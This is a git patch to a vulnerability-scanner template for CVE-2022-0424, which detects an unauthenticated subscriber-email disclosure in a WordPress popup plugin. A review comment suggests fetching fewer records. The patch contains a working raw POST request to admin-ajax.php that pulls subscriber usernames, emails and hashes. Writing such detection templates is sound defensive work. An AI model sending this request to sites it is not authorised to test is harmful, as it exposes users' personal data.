From 97864a8e5fe59038986f237d23cc6dc2a021f550 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 11 Apr 2024 10:10:31 +0530
Subject: [PATCH] updated matchers, info & req type

---
 http/cves/2022/CVE-2022-0424.yaml | 43 +++++++++++++++++--------------
 1 file changed, 23 insertions(+), 20 deletions(-)

diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml
index 8c62498717..5a972b442e 100644
--- a/http/cves/2022/CVE-2022-0424.yaml
+++ b/http/cves/2022/CVE-2022-0424.yaml
@@ -1,13 +1,14 @@
 id: CVE-2022-0424
+
 info:
-  name: Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure
+  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
   author: Kazgangap
   severity: medium
   description: |
     The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
     - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
@@ -17,32 +18,34 @@ info:
     epss-percentile: 0.34103
     cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
   metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
     vendor: supsystic
     product: popup
     framework: wordpress
-  tags: wpscan
+  tags: cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php"
-    headers:
-      Content-Length: "104"
-      Accept: "application/json, text/javascript, */*; q=0.01"
-      X-Requested-With: "XMLHttpRequest"
-      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
-      Accept-Encoding: "gzip, deflate"
-      Accept-Language: "en-US,en;q=0.9"
-      Connection: "close"
-    body: |
-      page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
 
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - '"id":"1","username"'
-          - 'email'
-          - 'hash'
+          - '"id":"'
+          - 'username":"'
+          - 'email":'
+          - 'hash":"'
+          - '_wpnonce'
+        condition: and
+
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
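Review bot: The raw request still asks the vulnerable endpoint for up to ten subscriber records (`rows=10`) even though every word in the new matcher is satisfied by a single row, so each scan retrieves more subscriber PII from the target than the proof needs. `sidx`, `rows` and `_search` look like jqGrid paging parameters, so `rows=1` should return the same JSON shape; if that holds on a verified target, change the body line to `page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=1`. Leaving the template without extractors is the right call, since it confirms the leak without writing addresses into scan output, and a short comment above `raw:` such as `# no extractors on purpose: confirm the leak without logging subscriber emails` would keep a later contributor from adding one.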